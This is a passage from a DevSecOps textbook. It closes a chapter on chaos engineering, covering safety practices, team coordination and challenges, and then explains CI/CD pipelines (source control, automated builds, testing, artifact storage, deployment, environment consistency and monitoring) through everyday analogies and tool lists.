Basic principles of chaos engineering Ensuring the safety of systems during chaos engineering experiments is an essential aspect of the process. Here are a few ways that organizations can ensure the safety of their plans during chaos engineering experiments: • Establishing safety limits: Organizations should set safety limits for the tested systems before conducting any experiments. These limits should take into account the system’s expected behavior and should be used to stop an experiment if the system begins to suddenly behave unexpectedly. • Monitoring the system: Organizations should closely monitor the system during the experiment to detect unintended consequences and ensure that the system behaves as expected. • Rollback mechanisms: Organizations should have rollback mechanisms in place that can quickly restore the system to its previous state if an experiment begins to have unintended consequences. • Communication: Organizations should have clear communication channels in place between the teams conducting the experiments and other teams that may be affected by the experiment. This can help to minimize the risk of unintended consequences and allow any issues that may arise to be quickly addressed. • Testing: Organizations should conduct thorough testing before conducting the experiments in order to minimize the risk of unintended consequences. • Safety nets: Organizations should have safety nets in place, such as circuit breakers, rate limiters, and other mechanisms that can quickly stop the experiment if something goes wrong. • Having a plan B: Organizations should have a plan B ready in case of emergency, so that they can act swiftly and minimize the impact of the failure. It’s important to note that these are just a few examples of ways that organizations can ensure the safety of their systems during chaos engineering experiments. The specific approach will depend on the organization and the systems being tested. Additionally, it’s essential to have a clear set of objectives and a defined scope for the experiment before starting to ensure the safety of the systems.

Team communication strategies while performing chaos engineering experiments Communicating and coordinating with other teams during chaos engineering experiments is an essential aspect of the process. Here are a few ways that organizations can communicate and coordinate with other teams during chaos engineering experiments: • Clearly define the scope and objectives: Before conducting any experiments, organizations should clearly define the scope and objectives of the experiment and communicate this information to all relevant teams.

57

58

Understanding Chaos Engineering

• Communicate the schedule: Organizations should communicate the schedule of the experiment to all relevant teams and provide advance notice of when the experiment will be taking place. • Create a dedicated communication channel: Organizations should create a dedicated communication channel that can be used to communicate information about the experiment in real time. • Incident response plan: Organizations should have an incident response plan and communicate it to all relevant teams. This plan should outline the steps that should be taken in the event of an unintended consequence. • Assign a point of contact: Organizations should assign a point of contact that other teams can reach out to with any questions or concerns about the experiment. • Conduct a post-experiment review: Organizations should conduct a post-experiment review and communicate the results to all relevant teams. • Continuously improve: Organizations should improve communication and coordination by incorporating feedback from other teams and updating incident response plans.

Developing robust chaos engineering practice from failures Incorporating the lessons learned from chaos engineering into an organization’s overall security strategy is an important aspect of the process. Here are a few ways that organizations can incorporate the lessons learned from chaos engineering into their overall security strategy: • Identify and prioritize vulnerabilities: Organizations should identify and prioritize vulnerabilities identified during chaos engineering experiments and develop a plan to address them • Improve incident response plans: Organizations should incorporate the lessons learned from chaos engineering into their incident response plans to ensure they are better prepared to handle real-world failures • Continuous improvement: Organizations should continuously improve their systems by incorporating the lessons learned from chaos engineering experiments and by regularly conducting new experiments to identify new vulnerabilities • Update security policy: Organizations should update their security policies and procedures to reflect the lessons learned from chaos engineering experiments • Communicate the results: Organizations should communicate the results of chaos engineering experiments to all relevant teams and stakeholders so that they are aware of the vulnerabilities identified and the steps taken to address them • Integration with other testing methods: Organizations should integrate the results of chaos engineering experiments with other testing methods such as penetration testing, vulnerability scanning, and threat modeling

How chaos engineering is different from other testing measures

• Budget allocation: Organizations should allocate the necessary budget and resources to address the vulnerabilities identified during chaos engineering experiments

Challenges around chaos engineering Chaos engineering, despite its potential benefits, isn’t a walk in the park. There are definitely some tricky spots that can make things a bit challenging. Let’s discuss a few of them. Some challenges around chaos engineering are as follows: • Identifying appropriate and safe failure scenarios to test • Ensuring that the system is able to recover from failures without causing further issues • Balancing the need to test the system’s resilience with the need to avoid causing harm or disruption to users or customers • Communicating and coordinating chaos testing with other teams and stakeholders • Properly monitoring the system during and after chaos tests to identify and analyze any issues that arise • Lack of specific tools and guidelines for implementing chaos engineering • Difficulty in establishing a clear scope and defining success criteria • Difficulty in measuring the improvement after the chaos engineering process is complete To sum up, chaos engineering helps by intentionally introducing controlled failures or disruptions into a system in order to test its resilience and identify weaknesses. It helps to identify and mitigate potential failures, improving the overall reliability and availability of a system.

How chaos engineering is different from other testing measures Chaos engineering is like a stunt double for our systems. It takes on the tough, unexpected scenarios to see how our systems would react, so that when the real thing comes along, they’re ready to perform. Here’s how it’s different from other testing measures: • Real-world conditions: Traditional testing often takes place in controlled, predictable environments. Think of it like practicing a dance routine in a spacious, mirrored dance studio. On the other hand, chaos engineering is like practicing that same routine on a crowded dance floor with spilled drinks and unpredictable dancers. It mimics the unpredictable, chaotic conditions of the real world to see how systems perform under stress. • Proactive, not reactive: Most testing methods are reactive – they identify bugs or problems after they’ve occurred, or they validate that a certain feature is working as expected. Chaos

59

60

Understanding Chaos Engineering

engineering is more proactive. It’s about poking and prodding our systems on purpose to see whether we can uncover any hidden issues before they become real problems. • Focus on system resilience: While traditional testing is typically focused on individual features or components, chaos engineering takes a higher-level view. It’s more interested in how the system as a whole can handle disruptions and continue to function. • Running in production: Unlike most traditional testing, which happens in a separate testing or staging environment, chaos engineering often happens in production (i.e., the real world where your users are). This is because production is where true complexity and unpredictability lie. • Learning from failure: Chaos engineering embraces the idea that failure is not only inevitable but also a valuable source of learning. It helps us to fail better, learn more, and build stronger systems as a result.

Summary We’ve taken a long journey in this chapter, exploring what chaos engineering is all about. Far from being about causing destruction and disorder, chaos engineering is like a stress test for our digital systems, helping us find weaknesses and make them stronger. In a world where our digital systems are as complex as a spider’s web, chaos engineering is like a flashlight helping us see how to improve them. Chaos engineering is a little like being a detective, making educated guesses about where weaknesses might lurk, running experiments, and seeing what we can learn. We found out that chaos engineering is a practical tool that can make our systems better at weathering the inevitable disruptions that come their way. We’ve delved into how we can use different tools and techniques to carry out chaos engineering, and how important it is to have everyone on board – from the tech team right up to the boss. This isn’t something that can be done in a corner, it’s a whole-team effort. Of course, we also had a discussion of some of the challenges with chaos engineering. It’s not a cureall, and it’s got to be done thoughtfully. But the good news is that we’re all learning together, and we can navigate those challenges as a community. As we wrap up, let’s remember one thing: the world of digital systems is always changing and evolving. Chaos engineering is a compass that can guide us through that landscape, helping us understand and prepare for the unpredictable. So, what’s next? Well, the adventure is just starting! This isn’t the end, but the beginning of a journey into building stronger, more resilient systems. Remember to stay curious, keep trying new experiments, and learn as much as you can. Embrace the chaos – it’s how we grow, adapt, and build the best systems we can. So, buckle up and enjoy the ride! In the next chapter, we will cover Continuous Integration and Continuous Deployment (CI/CD) and understand their benefits and importance.

Part 3: Technology This part introduces you to continuous integration and continuous deployment, as well as aspects of setting up a DevSecOps environment. This part has the following chapters: • Chapter 6, Continuous Integration and Continuous Deployment • Chapter 7, Threat Modeling • Chapter 8, Software Composition Analysis (SCA) • Chapter 9, Static Application Security Testing (SAST) • Chapter 10, Infrastructure-as-Code (IaC) Scanning • Chapter 11, Dynamic Application Security Testing (DAST)

6 Continuous Integration and Continuous Deployment CI/CD stands for continuous integration/continuous deployment/delivery. While CI automatically releases every change to production, CD ensures changes are production-ready but may require a manual step for deployment. It is a software development practice that involves frequently integrating code changes into a central repository and then automatically building and deploying those changes to a test or production environment. CI is the practice of regularly merging code changes into a shared repository, where automated tests are run to catch any issues that may have been introduced. CD is the practice of automatically deploying code changes that pass all tests to a production environment. A CI/CD pipeline automates the process of testing, building, and deploying software changes; it helps catch and fix errors early, reduces the risk of introducing bugs, and improves the overall software quality. We will cover the following topics in this chapter: • What is CI/CD? • The benefits of CI/CD • Automating the CI/CD pipeline • The importance of the CI/CD pipeline

64

Continuous Integration and Continuous Deployment

What is a CI/CD pipeline? The CI/CD pipeline is the backbone of modern software practices, ensuring that software is always improving, with changes smoothly integrated and swiftly delivered to users. It’s all about making sure your “scrapbook” remains neat, beautiful, and always ready to be shown off! Imagine you’re creating a scrapbook. Every time you get new photos, stickers, or materials, you want to add them to your scrapbook and make sure they fit well without spoiling the previous pages. CI/CD is a bit like this process for software development, ensuring every change fits well and gets neatly integrated into the bigger picture.

CI CI is the process of continuously adding (or integrating) new changes in code to the main project. Every time you get a new photo (code change), you try adding it to your scrapbook (main project) to make sure it fits. Without CI, developers might work separately, and when they try to merge their changes, things can get messy. It’s like if multiple people tried to add different items to the same page of a scrapbook without coordinating. As developers write and commit code, it is continuously integrated into a shared repository. After integration, automated tests ensure that the new code doesn’t break anything. In essence, CI is like a safety net that ensures that all parts fit well together. Example: Imagine you’re building a puzzle with a team. Every time a member adds a piece, you check to make sure it fits perfectly and doesn’t ruin the image. If it doesn’t fit, you correct it immediately. That’s similar to how CI works. Developers contribute code (puzzle pieces), and the CI process checks to ensure everything still works together.

CD – continuous delivery and continuous deployment In terms of continuous delivery, once changes are integrated, they’re continuously made ready for release to the public. However, releasing these changes requires manual approval. However, continuous deployment goes a step further. Every change, once integrated and tested, is automatically released to users without manual intervention. Let’s take a look at these aspects in terms of our scrapbook example: • Continuous delivery: You’ve added the photo to the scrapbook, and it’s ready to be shown to friends (released), but you’ll decide when • Continuous deployment: When you add a photo or sticker to the scrapbook, you immediately show it off to friends without waiting

The benefits of CI/CD

It allows faster delivery of features to users and quick feedback. Imagine getting compliments or suggestions on your scrapbook when you add something new! Just like the process of selecting a photo, gluing it, and adding captions or decorations to a scrapbook page, there are steps to integrate and deliver/deploy software changes. This sequence of automated steps is what we call a pipeline. A CI/CD pipeline is a set of automated processes that allow developers to reliably and efficiently release new changes and features to users. From the moment code is written until it is in the hands of the users, it moves through various stages in this pipeline, including integration, testing, and deployment. Think of the CI/CD pipeline as an assembly line in a factory. The raw materials (code) enter one end, machines (tools and tests) process the materials at different stages, and the finished product (a working software application) comes out the other end, ready for customers. In the world of software, a CI/CD pipeline can include these steps: • Fetching the latest code: Grabbing the latest “photos” (code changes). • Building: Turning code into a runnable application. This could involve setting the page layout. A developer writes and commits code to a version control system (such as Git). • Deployment: Making the new changes live and showing off that scrapbook page. • Testing: Checking if the new changes “fit” well and don’t “spoil” anything, as well as making sure that the photo isn’t upside down! If tests pass, the CD process starts. Depending on the setup, the code might either be automatically deployed to a production environment (continuous deployment) or might be moved to a staging environment, where it awaits its final approval (continuous delivery).

The benefits of CI/CD The CI/CD pipeline, a cornerstone of modern software development, offers multiple advantages. Enabling a faster release cycle ensures that new features and fixes reach the end users swiftly. Through automation, the pipeline guarantees consistent, error-free deliveries, minimizing manual tasks and the associated risks. This efficiency boosts developer productivity by allowing them to center their attention on coding rather than administrative chores. An essential aspect of the pipeline is its continuous testing mechanism, which detects issues early on, facilitating a rapid feedback loop. As a cumulative result, not only do developers benefit, but end users also enjoy regular, high-quality updates, enhancing their overall satisfaction. Let’s look at the different benefits: • Faster release cycle: CI/CD pipelines automate various stages, enabling quicker releases of new features or fixes. It’s like having a fast-food drive-thru instead of a sit-down dinner. Instead of waiting for the whole meal (software release) to be prepared and served, items (code updates) are served quickly, as and when they’re ready.

65

66

Continuous Integration and Continuous Deployment

• Consistent and reliable deliveries: Automation reduces the chances of human error. Every code change undergoes the same rigorous set of tests and processes every time. Imagine a cookiemaking machine that produces a cookie every time a dough ball is inserted. Each cookie will be of consistent shape and size because the process is automated. This consistency is what CI/ CD brings to software releases. • Early detection of issues: Since code is continuously tested, issues are detected and addressed earlier in the development cycle. Think of a factory assembly line with quality checkpoints. If a toy being assembled has a defect at stage 2, it’s caught right then, rather than after the toy has been fully assembled. • Reduced manual intervention: Many of the steps are automated, which means fewer manual tasks, reducing the chances of manual errors. Consider modern car washes. Instead of several people manually washing your car, machines handle most of the process. It’s not only faster but also more consistent. • Enhanced developer productivity: Developers spend less time fixing late-stage bugs or managing releases and more time writing and optimizing code. It’s like a chef using a food processor to chop vegetables. Since the repetitive task of chopping is taken care of quickly, the chef can focus on perfecting the recipe. • Rapid feedback loop: Developers receive immediate feedback on their changes. This allows for quick adjustments and ensures developers are always working on the highest-priority task. Imagine teaching someone to play a guitar. If you correct their finger placements immediately, they’ll learn faster and more accurately than if feedback was provided days later. • Improved customer satisfaction: Faster release cycles with fewer bugs mean users get new features quickly and face fewer issues. Think of a favorite app on your phone. If it gets regular updates with cool new features and minimal bugs, you’d likely be a happier user, right? • Scalable and repeatable process: As the team and project grow, the CI/CD pipeline ensures that the process remains consistent and can handle increased demands. Picture a popular lemonade stand. If they use a tried-and-true recipe and automated juicers, they can easily handle long lines of customers and maybe even open new stands without compromising on quality and taste.

Automating the CI/CD pipeline Automating the CI/CD pipeline is about ensuring the code journey – from writing to production – is smooth and efficient. Automating the CI/CD pipeline is like setting up a state-of-the-art bakery where cakes (software) are baked, tested, and delivered with minimal human intervention, ensuring consistency, quality, and speed. Let’s break down this automation step by step, keeping the explanations simple and using relatable examples.

Automating the CI/CD pipeline

Source control All the code resides in a version-controlled repository. When developers make changes, they “commit” them to the repository. At its core, source control is a system that records changes to files (usually code) over time. This allows multiple people to collaborate on a project without stepping on each other’s toes, and it provides a mechanism to revert to a previous version if needed. Picture a shared digital library. Whenever someone writes a new chapter (code) for a book (software), they add it to the library. Popular tools such as Git, Mercurial, and Subversion have made version control easier and more efficient, allowing teams of any size to collaborate seamlessly on software projects.

The importance of source control • Collaboration: Multiple developers can work on the same project simultaneously • History: You can track changes and go back to any previous state of a project • Accountability: It’s easy to see who made which changes and when • Backup: In case of issues or errors, there’s always a safe version to revert to

Common terminologies • Repository (Repo): This is where your code lives. It’s a centralized storage space for all code files, revision history, and more. Think of it as a bookshelf dedicated to a specific story. The shelf doesn’t just hold the latest version of the story but all its drafts and changes too. • Commit: When you make changes to your code and are satisfied, you “commit” those changes, effectively taking a snapshot of your code at that moment. It’s like finishing a chapter in your story and taking a photo of it. • Branch: Sometimes, developers need to create a separate environment from the main project to work on new features or experiments without affecting the main project. Imagine creating a spin-off from the main story. You branch out to write a side story without changing the main plotline. Once you’re satisfied with the spin-off, you can integrate it back into the main story. • Merge: Once the work on a branch is complete and tested, it can be combined (or “merged”) back into the main project. Once the side story (branch) has been finished and polished, you can weave it back into the main story.

Best practices • Commit often: Small, frequent commits are better than large, infrequent ones. They’re easier to understand and manage. • Write meaningful commit messages: Descriptive messages help other developers understand why certain changes were made.

67

68

Continuous Integration and Continuous Deployment

• Keep the build healthy: Ensure that your changes keep the software intact. Always test before committing. • Sync regularly: Pull the latest changes often to stay updated and avoid merge conflicts. • Use branches: For every new feature or bug fix, use separate branches. This keeps the main (often called “master”) branch stable. • Feature flags or toggles: These allow features to be merged into the main branch, even if they aren’t ready for release, and they can be toggled on or off in production. A common question beginners ask is, “Why can’t I just make copies of my project with different names, such as “project-v1”, “project-v2”, and so on?” Well, while this is technically a way to have different versions, it’s highly inefficient: • Space: Saving multiple copies eats up storage space. • Collaboration: It’s hard to collaborate. Which version are others using? How do you consolidate changes? • Tracking changes: With source control, you can view granular changes down to a single line of code. With the “Save As” method, you’d manually compare files. • Automation and integration: Modern source control tools integrate with other tools, allowing for automation (such as automated testing) when code is committed. In essence, source control isn’t just about keeping versions of your code. It’s about facilitating efficient collaboration, maintaining a record of the who/why/when of changes, and integrating seamlessly into a modern software development life cycle (SDLC).

Automated builds Once the code is in the repository, automation tools compile or build the software to create an executable product. An automated build is a process where source code is automatically compiled and transformed into executable files, often without any human intervention. Think of it as a self-operating factory that takes in raw materials (source code) and produces a finished product (executable software). Before automated builds, developers had to manually compile and link their code, which was both time-consuming and error-prone. It was akin to crafting a piece of furniture by hand every time. Automated builds brought in machinery to do it consistently and swiftly. Think of this as a bakery machine. When you add ingredients (code) and select a setting, the machine automatically bakes a cake (software).

Automating the CI/CD pipeline

The importance of automated builds • Consistency: Every build is done the same way, eliminating “it works on my machine” scenarios • Speed: Computers work quickly, and automating the build process means developers can get feedback on their work almost immediately • Error detection: Automated builds often include tests, so any errors in the code can be detected early • Efficiency: Developers can focus on writing code, knowing the building and testing of their code is handled for them

Key components and terminologies • Build script: A set of instructions that the automated build system follows to compile and build the software. It’s like a recipe in cooking. Just as a recipe guides you step by step in preparing a dish, the build script guides the computer in creating the software. • CI server: A dedicated machine or server where the automated build process occurs. It continuously checks for new code commits initiates builds and runs tests as well. It’s like a watchful chef who starts preparing dishes as soon as new ingredients (code) are available. • Dependencies: Many software projects rely on external libraries or components to function. These are called dependencies. Think of baking a cake. Apart from your main ingredients, you might need toppings, fillings, or frosting from different sources. These additional items are like your code’s dependencies. • Build artifact: This is the output of the build process and is usually the executable file or software package. The final dish or meal is ready to be served after all cooking steps are complete. • Build failure: If there’s an error in the code or build process, the build will fail. Your cake didn’t bake properly because you forgot the baking powder. The failed cake is akin to a build failure. Automated build systems often work in collaboration. They’re part of a larger ecosystem: • Source control: Before a build starts, the latest code is fetched from a version control system such as Git • Testing: After a successful build, automated tests can be run to ensure the software’s quality • Deployment: If the build and tests succeed, the software can be automatically deployed to servers or app stores • Notifications: Developers and teams are notified about the build’s success or failure, often via email, chat apps, or dashboard displays

69

70

Continuous Integration and Continuous Deployment

Challenges and solutions around automated builds • Flaky builds: Sometimes, builds fail inconsistently due to non-deterministic factors such as race conditions, uninitialized variables, time-dependent tests, and resource contention: ‚ Solution: Regularly clean up build environments, improve test reliability, and use build caching judiciously • Long build times: As projects grow, build times can increase, slowing down feedback to developers: ‚ Solution: Optimize build scripts, use parallel and distributed builds, and ensure efficient dependency management • Dependency hell: Managing external libraries and their versions can become tricky: ‚ Solution: Use dependency management tools and ensure that the build process uses locked and known versions of dependencies

Popular automated build tools • Jenkins: An open source automation server that’s highly customizable with plugins • Travis CI: A cloud-based CI/CD service integrated with GitHub • CircleCI: Another cloud-based CI/CD platform that’s popular for its speed and integration capabilities • Gradle and Maven: Popular build automation systems for Java projects • MSBuild: A build platform for .NET and Visual Studio projects

Continuous testing Continuous testing is an important facet of modern software development. After building the software, automation tools run a suite of tests to check if everything works as expected. Continuous testing is more about immediate feedback and ensuring software quality at every stage. It’s like having a quality inspector who checks a product at every stage of its assembly line, ensuring that any defects are immediately addressed. In the software world, continuous testing is the process of running tests automatically, often and immediately, every time there’s a change in the code, ensuring that new changes haven’t introduced errors.

The importance of continuous testing • Immediate feedback: Developers know right away if their changes have broken anything • Efficiency: Catching issues early means they’re cheaper and easier to fix • Confidence: With continuous testing, teams can be more confident that their code is always in a “ready-to-release” state

Automating the CI/CD pipeline

Key components and terminologies • Unit tests: These are tests that check individual pieces (or “units”) of code, such as functions or methods, in isolation. It’s like checking each ingredient’s quality before using it in a recipe. • Integration tests: While unit tests focus on individual parts, integration tests ensure that these parts work well together. Once all the ingredients have been verified, you ensure they blend well together in a dish. • Regression tests: These tests ensure that new code changes haven’t negatively affected existing functionality. After adding a new spice to a dish, you taste it to make sure the original flavor hasn’t been lost. • Test automation tools: These are software tools that automatically run the aforementioned tests every time there’s a change. Think of these tools as automated taste-test robots that sample the dish every time an ingredient is added. • Test environment: This is a controlled setting where tests run. It replicates the conditions in which the software operates. Think of it like a test kitchen where you experiment with recipes before serving them in a restaurant.

Challenges and solutions • Maintaining test quality: Just having tests isn’t enough; they need to be good tests! ‚ Solution: Regularly review and update tests, ensuring they’re comprehensive and relevant • Speed: As software grows, so does the number of tests, which can slow down the process: ‚ Solution: Use parallel testing (running multiple tests at once) and optimize test code for speed • False positives: Sometimes, tests fail not because of a genuine issue but due to some test flakiness or external factors: ‚ Solution: Regularly review test results, improve test reliability, and adjust as needed

Popular continuous testing tools • JUnit: One of the most popular testing frameworks for Java, JUnit provides annotations to write and run tests easily. • Selenium: This is a leading tool for automating web browsers. It allows testers to write scripts in various languages and run them across different web browsers, ensuring the application works consistently. • Jenkins: While Jenkins is renowned as a CI tool, it’s also pivotal for continuous testing. Jenkins can automatically trigger tests after every build.

71

72

Continuous Integration and Continuous Deployment

• TestNG: This is similar to JUnit but it provides more advanced functionalities, especially for integration and end-to-end tests. It’s primarily used with Java. • Cucumber: This is a tool for behavior-driven development (BDD). Test cases are written in plain English, making them understandable even to non-tech stakeholders. • QUnit: Used for testing JavaScript code, QUnit is popular among web developers. • Appium: This is an open source tool for automating mobile applications on both Android and iOS using the WebDriver protocol. • LoadRunner: For performance testing, LoadRunner from Micro Focus is a popular choice. It helps in identifying and resolving bottlenecks in a system. • Travis CI: A cloud-based CI/CD platform integrated with GitHub. It allows automated testing and deployment. • CircleCI: Another CI/CD platform popular for its continuous testing and integration capabilities. • GitLab CI/CD: Built into the GitLab platform, it allows for easy setup of continuous integration, delivery, and deployment, along with testing. • Postman: While it started as a tool for testing APIs, Postman has evolved into a full-fledged system for API development and testing.

Artifact storing Think of building software like crafting a hand-made car. You’ve assembled various pieces, painted them, and made the engine. These pieces, or the final car itself, are valuable items that you’d want to store in a safe place, perhaps a garage or a showroom. In the software world, after we “build” or “compile” our code, we get files (such as executable files, libraries, or packaged applications). These files are called “artifacts.” We need a safe and organized place to store them. That’s where artifact storing comes into play. After successful testing, the built version of the software, called an “artifact”, is stored safely for deployment.

The importance of artifact storing • Safety: Just as you’d want your hand-crafted car to be safe from rain, theft, or other damages, we want our software artifacts safe from data losses. • Version control: Over time, you might make different models or versions of your car. Similarly, software evolves, and we want to keep track of all versions of our artifacts. • Accessibility: If someone wants to see or buy a particular model of your car, they should be able to easily locate it in the showroom. Likewise, developers or deployers should easily find and access the necessary software version.

Automating the CI/CD pipeline

• Consistency: Artifact repositories ensure consistent deployment across different environments. When deploying an application, you pull the same artifact from the repository, whether it’s for staging, testing, or production. This ensures that what you test is precisely what gets deployed. • Collaboration: Teams across the globe can access the same set of artifacts, ensuring synchronized development and deployment efforts. It’s akin to a library that has branches worldwide, but each branch has an identical collection of books. • Dependency management: Software projects often depend on other libraries or modules. Artifact repositories can store these dependencies, ensuring that all developers use the exact versions, reducing the infamous “it works on my machine” problem.

Key components and terminologies • Repository: This is the dedicated storage space where artifacts are kept. It’s organized and indexed for easy retrieval. Think of it as a specialized garage for your hand-crafted cars, where each car (or artifact) has its spot. • Metadata: This is additional information about each artifact, such as its creation date, creator, version number, and so on. An example is the spec sheets or labels for each car in your showroom, detailing its features, make date, and model.

Popular artifact-storing tools • JFrog Artifactory: A universal artifact repository manager. It supports all major packages, build tools, and CI servers. • Nexus Repository: Another popular choice, Nexus Repository manages software components, Docker containers, and other build artifacts. • GitHub Packages: Integrated with GitHub, it allows you to host software packages right alongside your source code. • Docker Hub: While mainly for Docker containers, Docker Hub can be seen as an artifact store for Docker images. • AWS Simple Storage Service (S3): Amazon S3 can also be used as an artifact store, especially when combined with other tools. • Azure Artifacts: Part of Azure DevOps, it offers package feeds for Maven, npm, Python, and NuGet. • Google Cloud Storage: Like AWS S3, GCS can also be tailored for artifact storage needs.

Key features of artifact-storing tools • Retention policies: Over time, the number of artifacts can grow exponentially. Good artifact tools allow you to set retention policies, determining how long to keep older versions before archiving or deleting them.

73

74

Continuous Integration and Continuous Deployment

• Security and access control: These tools have mechanisms to control who can upload or download artifacts. Think of it as a vault where only authorized personnel can deposit or withdraw items. • Search functionality: As repositories grow, finding specific artifacts can become challenging. Good search functionalities, aided by metadata, make this task easier. • Replication and backup: Leading artifact storage tools allow replication of repositories across multiple locations, ensuring high availability and disaster recovery. • Integration with CI/CD: Integrating artifact storage with CI/CD tools ensures a seamless pipeline from code integration to deployment.

Further considerations • Storage costs: As your repository grows, so does the storage cost. It’s essential to keep an eye on storage needs and optimize accordingly, utilizing retention policies and efficient storage solutions. • Maintenance: Like any other system, artifact storage tools require maintenance. Regular backups, updates, and monitoring are crucial. • Hybrid and cloud solutions: Modern artifact storage tools offer cloud solutions, allowing flexibility in storage and access. Some also provide hybrid options, storing some artifacts on-premises while others are in the cloud.

Deployment automation Deployment automation, while complex, is a revolutionary way of ensuring software gets where it needs to be, efficiently and effectively. Whether you’re serving a few or feeding thousands, deployment automation tools and methodologies are designed to make sure everyone gets what they’re expecting. The software artifact is automatically deployed to a server or cloud for user access. Imagine you’ve made a delicious dish and you want to serve it at multiple parties. Instead of individually visiting each party to serve it, what if you had a magic tray that could instantly place your dish on every table? That’s sort of what deployment automation is about – ensuring that your software/application (the dish) gets to every intended server or environment (the parties) efficiently and consistently.

The importance of deployment automation • Consistency: It ensures that the application is deployed the same way every time, reducing errors. • Speed: Automated processes are faster than manual ones. You can serve more parties quicker! • Scalability: If your dish becomes super popular and you need to serve more parties, automation can handle that without getting overwhelmed. • Reproducibility: If there’s an issue at one party, you can trace back the exact version of your dish that was served.

Automating the CI/CD pipeline

Key components and terminologies • Configuration management: Make sure every party location is ready to accept and serve your dish, with the correct table settings • Rollback: If you realize there’s an issue with the dish (maybe it’s too salty), you can quickly replace it with a previous version that everyone liked

Popular deployment automation tools • Jenkins: A powerhouse in the CI/CD world, Jenkins can automate the deployment of applications across various environments • Ansible: Primarily a configuration management tool, Ansible can set up systems and deploy applications with its simple playbook approach • Docker: While it’s known for containerization, combined with tools such as Kubernetes, Docker can automate the deployment of containerized applications • Spinnaker: Created by Netflix, Spinnaker is a multi-cloud CD platform for releasing software changes with high velocity and confidence • Octopus Deploy: A user-friendly tool focused on deploying applications, whether on-premises or in the cloud • AWS CodeDeploy: Amazon’s deployment service that automates application deployments to different AWS services such as EC2, Lambda, and more • GitLab CI/CD: Part of the GitLab platform, it provides a streamlined workflow to automate the deployment process • Bamboo: Atlassian’s CI/CD offering, Bamboo, integrates seamlessly with other Atlassian tools such as JIRA and Bitbucket

Challenges in deployment automation • Complexity: Automating can be complex, especially for large-scale applications with multiple components. It’s like trying to serve a 10-course meal to hundreds of tables simultaneously. • Initial setup time: The initial phase of setting up deployment automation can be time-consuming, but it’s an investment. It’s the difference between teaching one person to make a dish versus setting up an entire automated kitchen. • Error management: Mistakes in the automation process can lead to widespread issues. For instance, if there’s an error in your dish and it’s automatically served to hundreds of tables, the impact is vast.

75

76

Continuous Integration and Continuous Deployment

Real-world scenarios • Scenario 1: You’ve developed a new feature for your online store. Instead of manually updating the store’s website, an automated system detects the change, tests the feature, and if all’s good, updates the website – all while the store runs uninterrupted. • Scenario 2: A gaming company releases a new level for its popular game. Instead of gamers having to manually download and install the new level, it’s automatically deployed to their devices, ensuring everyone gets the same experience.

Advanced tools and technologies • Terraform: An IaC tool that allows you to define and provide infrastructure for multiple cloud platforms using a simple, consistent language. • Kubernetes: An open source system for automating deployment, scaling, and management of containerized applications. It ensures that the environment where your application runs is consistent. • Chef and Puppet: Configuration management tools that ensure every system is set up precisely as required, based on predefined “recipes” or “manifests.” • Rollbar and Sentry: Tools to monitor applications after deployment. If something goes wrong, they help identify what it was so that it can be fixed quickly.

Environment consistency Environment consistency is the gold standard for ensuring software behaves predictably across different stages of its life cycle. Like a chef wanting their kitchen set up identically everywhere, developers strive for uniform environments to eliminate unexpected issues and enhance reliability. With modern tools in the mix, this consistency is achievable, ensuring that the “dish” (software) always meets expectations, no matter where it’s “served” (deployed). Automation tools ensure that the software’s environment (such as server configurations) is consistent across different stages, such as testing, staging, and production. Picture a popular chef, say, Gordon Ramsay, trying to cook his signature dish in different kitchens. For the dish to taste identical every time, every kitchen he uses must have the same oven settings, same ingredients, same utensils, and so on. Similarly, in software development, “environments” are like those kitchens. For a piece of software to function identically in development, testing, staging, and production, all these environments need to be consistent or identical.

Importance • Predictability: Ensuring the dish (software) tastes (works) the same way every time it’s prepared (deployed). • Reliability: There’s confidence in the final result since tests in one environment reflect the behavior in others.

Automating the CI/CD pipeline

• Efficiency: Developers can avoid the notorious “it works on my machine” issue. There are no surprises due to environmental differences.

Challenges to achieve environment consistency • Diverse infrastructure: Different departments might use varying hardware and software • Configuration drift: Over time, minor changes in one environment can lead it to diverge from others • External dependencies: Sometimes, software depends on external services, which might behave differently across environments

Tools to maintain environment consistency Docker: • What is it? A platform that packages software into containers. Think of containers as portable kitchen boxes containing everything Gordon Ramsay needs to cook his dishes. He can carry this box to any location and still make the dish perfectly. • How does it help? By using Docker, developers ensure that the software runs in the same “container,” regardless of where the container is deployed. Kubernetes: • What is it? A system for managing containerized applications across a cluster of machines. Imagine a team of chefs coordinating to use the same kitchen box in various locations. • How does it help? Kubernetes ensures that Docker containers are uniformly managed and orchestrated, preserving environment consistency even at scale. Terraform: • What is it? An Infrastructure-as-Code (IaC) tool. Think of it as a detailed recipe that describes exactly how to set up each kitchen. • How does it help? With Terraform, infrastructure (such as servers and databases) is consistently set up based on the code’s predefined “recipe.” Ansible, Chef, and Puppet: • What are they? Configuration management tools. They ensure every kitchen tool, ingredient, and setting is precisely as required. • How do they help? They automate the setup and maintenance of environments to ensure they match the desired state defined in their configurations (recipes).

77

78

Continuous Integration and Continuous Deployment

Monitoring and feedback Monitoring and feedback are indispensable in the realm of software development. They provide the real-time oversight and actionable insights needed to keep applications running smoothly and evolving in line with user needs. In the same way that a soccer coach observes, assesses, and guides players toward victory, effective monitoring and feedback tools guide software toward optimum performance and user satisfaction. Think of a soccer coach watching a match. The coach observes players, sees what’s working, spots weaknesses, and then gives feedback at half-time to improve the game. In the digital world, monitoring is like that coach, continuously watching over software applications, ensuring they’re performing as expected and catching any issues. Feedback is the actionable insight derived from this observation. Automated monitoring tools keep an eye on the software’s performance and health. If issues arise, notifications are sent out.

The importance of monitoring and feedback • Awareness: Just as a coach needs to be aware of every move on the field, developers need to know what’s happening with their applications in real time. • Swift problem resolution: If the coach spots a player making consistent mistakes, they can address it immediately. Similarly, quick feedback from monitoring tools allows developers to fix issues before they become critical. • Optimization: Over time, the feedback helps in refining and optimizing the application, just as players improve their strategies with consistent coaching feedback.

Challenges of monitoring and feedback • Data overload: Just as a coach can get overwhelmed watching multiple games simultaneously, monitoring tools can generate a flood of data that’s challenging to make sense of. • False alarms: Sometimes, monitoring tools can send alerts that aren’t critical, such as a car’s alarm going off due to a gust of wind. • Delay in feedback: Late feedback is like a coach giving advice after the match is over. It’s beneficial for the future but not immediate action.

Tools for monitoring and feedback • New Relic: A performance monitoring tool for web applications, mobile applications, infrastructure, and more. Similar to watching instant replays of critical match moments, New Relic allows developers to dive deep into specific transactions and see where bottlenecks or errors occur. • Prometheus: An open source monitoring toolkit. Think of it as setting up cameras at specific points on the soccer field. Prometheus targets specific metrics in your application, tracks them, and sends alerts if something’s amiss.

Automating the CI/CD pipeline

